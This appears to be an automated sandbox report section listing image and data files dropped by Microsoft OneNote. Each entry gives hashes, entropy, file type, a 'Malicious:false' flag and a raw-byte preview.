                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.\-......\-Z..`....dh...\-Z..`....dh...\-..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............ux..$..:Y?1'`;.....N...^................a..m.K.H&:............f........................................I.qk..B.....LZ.............ux..$..:Y?1'`;..........ux..$..:Y?1'`;...........\-......\-......\-..........................................\-j.....\-T.]...\-......\-..B...\-H.....\-..B...\-..>.).\-..J...................;........4...4...4.."...............\-..\-..\-..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........\-......\-....#.\-............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 77 x 627, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5136
                                                                                                                                                                                                              Entropy (8bit):7.622045262603241
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
                                                                                                                                                                                                              MD5:FA38AFA965141EA3F17863EE8DCCDE61
                                                                                                                                                                                                              SHA1:2B4611E651AF7549C1AA73932B1136B561A7602F
                                                                                                                                                                                                              SHA-256:E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
                                                                                                                                                                                                              SHA-512:A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.450890307120228
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:zWOspmlP2ZQBwatayEBU+XJ+9iYobBrdQqruaBXOg2vVZqap:VsHZkwaHE5XA9iYcRQy9Xix
                                                                                                                                                                                                              MD5:14DD510CA0147CB89F94E8A91FD9CEF0
                                                                                                                                                                                                              SHA1:F43D1E6931E0F63C623DA4915954BD39B61CDCC3
                                                                                                                                                                                                              SHA-256:03FFC187365873C081D80C5CBDDCAEFA888A7E40CD4C8F7351AC234CC70FB19D
                                                                                                                                                                                                              SHA-512:05048D82868A80B62617AB859A734C68DC26D9B49FFF0BE709CEC7A939EEDB92480C6D3D4FE2A3C16AC002BCB1090CFE491C16FC96A7A9B1A8F2D57EE2837322
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ..........._[...g...~...._[...g...~....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............v.s>.*..".....9....N...^..................S.q.O.....d.o........f........................................I.qk..B.....LZ............v.s>.*..".....9........v.s>.*..".....9....................................................................j......T.]............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4......................#..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52945
                                                                                                                                                                                                              Entropy (8bit):7.6490972666456765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                                                                                              MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                                                                                              SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                                                                                              SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                                                                                              SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.44048658790621
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:zWdPWDsOA4uaRtuOe5QEbLsXXAXDAtOey9e93VrdqrbafYxqxBXKbE240Z:iAsMuaRkaEbvXMt69e9FRyM6qxdm
                                                                                                                                                                                                              MD5:BC0043E5633B6D541CFA7227A32B4EC0
                                                                                                                                                                                                              SHA1:845B77BEBA7934A942E1CE0B4026464C36175756
                                                                                                                                                                                                              SHA-256:93DBE78EB0826DCC2DC97C3B8D99181A3685144F9CEA069861501E3C78A6072B
                                                                                                                                                                                                              SHA-512:ED0767364897FCCEE678BBE1E52E4803ABF00E30505084E00BFBC5DE40B46793771C50CAD23D9B4375F491E3B1765D067D4B1DC05FABABEA21982278E59BA281
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZh.......h....$.3r....-h....$.3r....-h....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................A$....0..XI.....N...^....................in@......h.........f........................................I.qk..B.....LZ................A$....0..XI.............A$....0..XI..........h.......h.......h...........................................h..j....h..T.]..h.......h...B..h..H....h....B..h....>.)h....J...................;........4...4...4.."..............h...h...h....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........h.......h......#h..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):79656
                                                                                                                                                                                                              Entropy (8bit):7.966459570826366
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
                                                                                                                                                                                                              MD5:39FF3ACAE544EAC172B1269F825B9E9F
                                                                                                                                                                                                              SHA1:2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
                                                                                                                                                                                                              SHA-256:70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
                                                                                                                                                                                                              SHA-512:3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\.*.N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........|..4.wJ*..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.457972523003907
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:oHsN5WH8l+oe3E0cpX4mcp9q83DwRy25elR/:0saH8lT9rpXip933DwRyOen
                                                                                                                                                                                                              MD5:11C43BE6AC1174DC121C40CC64000DC4
                                                                                                                                                                                                              SHA1:0F1ACDE9803A07C1A6C2CC0225E365C205E375D8
                                                                                                                                                                                                              SHA-256:B11A9AED3E8EF1E83FF70A61C731BFD0511E932C1AC6053E91D40F7F4CE34FB2
                                                                                                                                                                                                              SHA-512:C876BB1CF475DDF74EDAFA54161CE5A09329777509BA0674725008DA3243BDC926B2590D74F2641B47CB5C7E0CADCAB30B3533950A87379E97C3952C72083F52
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......p...v...d.....................................................?....?........................................................................2...>...L.......v................................I.......I.qk..B.....LZm.J.....m.J(....5.......m.J(....5.......m.J..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............#9^..0.._[$q.....N...^...................vUGJ.....X..........f................................... ....I.qk..B.....LZ..............#9^..0.._[$q...........#9^..0.._[$q..........m.J.....m.J.....m.J.........................................m.Jj....m.JT.]..m.J.....m.J..B..m.JH....m.J..B..m.J..>.)m.J..J...................;........4...4...4.."..............m.J.m.J.m.J..z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........m.J.....m.J....#m.J............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40884
                                                                                                                                                                                                              Entropy (8bit):7.545929039957292
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                                                                                              MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                                                                                              SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                                                                                              SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                                                                                              SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.355178873072197
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Yu2syMOhBMVM59fxXOSQt+5EfsW+bX89Liodrdqr6eu1RXJpIMVMb5IqMkMuMhx:YRsO9d5QcEkW+bX89LicRyu1i4
                                                                                                                                                                                                              MD5:4DF1A01F16292B52B96583B3BB56F301
                                                                                                                                                                                                              SHA1:8F2F499FB7DF57F5F21877FA495E1975AF2505F9
                                                                                                                                                                                                              SHA-256:014644639D965213C6A49C1166BFA8B06F40DD4A7BDA1EAE12B6C85E4AC347B0
                                                                                                                                                                                                              SHA-512:A06B77957FE6C780288D970C90325AEFC9B6BC03D2E815455B536642F3FB04887A1ED2769CA155529982B4AAC6303D969CFFAAF603A50DC4E75DCAFC2048EB14
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZf.".....f."B.Ny.!...6.k.f."B.Ny.!...6.k.f."..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............._#Q~...._...O&.....N...^...............F.6T..vM..).rh.%........f........................................I.qk..B.....LZ............._#Q~...._...O&.........._#Q~...._...O&..........f.".....f.".....f.".........................................f."j....f."T.]..f.".....f."..B..f."H....f."..B..f."..>.)f."..J...................;........4...4...4.."..............f.".f.".f."..z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........f.".....f."....#f."............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68633
                                                                                                                                                                                                              Entropy (8bit):7.709776384921022
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                                                                                              MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                                                                                              SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                                                                                              SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                                                                                              SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.39035541454536
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:5iskVDaT5ttSbEg3LaZJvevfxX09TEoflrdqr2zRX/GYuSUl:5iszTX+Eg3kmXxX09TEcRyIRxU
                                                                                                                                                                                                              MD5:62DB70DBC50E30534D54AD4461B44534
                                                                                                                                                                                                              SHA1:075BC9114CA66C3374262A1752847E2A6AB6DE19
                                                                                                                                                                                                              SHA-256:F4513037FD6BF9B3EC5990CE799898F1327B8DD8A467522CE9E843F72E25874C
                                                                                                                                                                                                              SHA-512:8D4106B3EF0412DD526472F3E507C09B7A4FFA377AD6D78A57BE1F70E3E7E06E1DAA8B10A5EED2B0F892803757A697681BAA6D0C73D36DE0D86F4BF43D15ACC6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......t...v...h...................................................................................................................................2...>...P.......v................................I.......I.qk..B.....LZ.............q...7..... .....q...7..... .....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............b....?=...#......N...^...............?....3C...s3..+........f...................................$....I.qk..B.....LZ..............b....?=...#............b....?=...#..........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 176 x 513, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11043
                                                                                                                                                                                                              Entropy (8bit):7.96811228801767
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
                                                                                                                                                                                                              MD5:8E9AB9C28B155A66BC5C0DA5E2A4EFB5
                                                                                                                                                                                                              SHA1:972E61F162D48F1CEE21963ECBB2FE439105DB55
                                                                                                                                                                                                              SHA-256:B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
                                                                                                                                                                                                              SHA-512:12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.|.L.|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....|.)
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.348104297302522
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YW2sudGBbR3ot5p6GKEQLQX5S9PDSoJrdqrDXo+ORX549rRNl:0srbxowEQMX5S9PDSARyLo+Oq
                                                                                                                                                                                                              MD5:3EBDCF35097F3D18D851AB2EBFE675E9
                                                                                                                                                                                                              SHA1:6F0ADF0E48FD994A18ECA17266CDD1C30020F32A
                                                                                                                                                                                                              SHA-256:75494BAFC27155CD4B7710A917C68A04A6FB96A84524E1FB0F6264E38ED45571
                                                                                                                                                                                                              SHA-512:1F9F53754A8B868CEC886E5E86D774F91E7169F15C38659276FC3CBB11A3A8986CA0F497CF29D4A122AA5539147E6B1B1A3D7EC5FE631C57D8667B331C83BB6D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZr8i.....r8iG....<...>...r8iG....<...>...r8i..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................l7....i..J......N...^.................3..QDH....v.M.........f........................................I.qk..B.....LZ...............l7....i..J.............l7....i..J...........r8i.....r8i.....r8i.........................................r8ij....r8iT.]..r8i.....r8i..B..r8iH....r8i..B..r8i..>.)r8i..J...................;........4...4...4.."..............r8i.r8i.r8i..z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........r8i.....r8i....#r8i............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 650, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):647
                                                                                                                                                                                                              Entropy (8bit):6.854433034679255
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
                                                                                                                                                                                                              MD5:DD876AA103BEC3AC83C769D768AD39FB
                                                                                                                                                                                                              SHA1:1833603AA9B6A7E53F9AD8A336F96CCE33088234
                                                                                                                                                                                                              SHA-256:1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
                                                                                                                                                                                                              SHA-512:946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.356392330897396
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:nJgs//wJiqu69AxaEjFFXp9/v+ARyKjcBOI:OsAJdxqxFXp9/2ARyKjc
                                                                                                                                                                                                              MD5:13F89BD6AED3A2A4FEABB6A72E707012
                                                                                                                                                                                                              SHA1:6BCE90925C03FF85C697375ECE6F517CD2F7CBA1
                                                                                                                                                                                                              SHA-256:36240551E810012959220FE71559845ACD433555477345640CE5929C4B1AB1C4
                                                                                                                                                                                                              SHA-512:C9343C940C8D487428D45360E09F889CCF1ACCDB5251DF7A09C7BAD1AC70A899E1424D70F63C6CC4D57EDAB7A0FE603546300EE0F5ECCEAC805694BE620B1597
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ% ~.....% ~...p.2.>...a.% ~...p.2.>...a.% ~..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................7.{.-.jq<." ....N...^................x.$...D...............f........................................I.qk..B.....LZ...............7.{.-.jq<." ...........7.{.-.jq<." .........% ~.....% ~.....% ~.........................................% ~j....% ~T.]..% ~.....% ~..B..% ~H....% ~..B..% ~..>.)% ~..J...................;........4...4...4.."..............% ~.% ~.% ~..z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........% ~.....% ~....#% ~............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52912
                                                                                                                                                                                                              Entropy (8bit):7.679147474806877
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
                                                                                                                                                                                                              MD5:1122BF4C2A42B4FA7F29D3C94954A7C9
                                                                                                                                                                                                              SHA1:3750077A830FE21735A43ABD35C63BA9A4D4B0DE
                                                                                                                                                                                                              SHA-256:423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
                                                                                                                                                                                                              SHA-512:4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=....*.......S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.289821279144936
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:M3sPxd42LFptnWRO9EkYTVXaC9vD6o5rdqrLMRXtDtTplv1:M3sNBp4aEkwXz9vD6wRygPh
                                                                                                                                                                                                              MD5:291C6C40217208CCD5C678C403ADD2E4
                                                                                                                                                                                                              SHA1:EE8FE493E96CA6ABBB41EC34344777E7A3700A15
                                                                                                                                                                                                              SHA-256:DA463C2902D14BE9882D085D49AA07CE974002FE84C0750140E7A1D621AECDA3
                                                                                                                                                                                                              SHA-512:FEF5B1460E9CE10D6FDD1DD095BDA63F7DE26AB0DBDF8124E738E41344F479E842031902D189413252DCF77033EFD365BCE7CCC73E96A5C29932C9EBB98DB9AC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........W'v.....1Q.O...W'v.....1Q.O.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............._.t......E.......N...^................;.h6a.N....K4.l........f........................................I.qk..B.....LZ............_.t......E..........._.t......E...........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
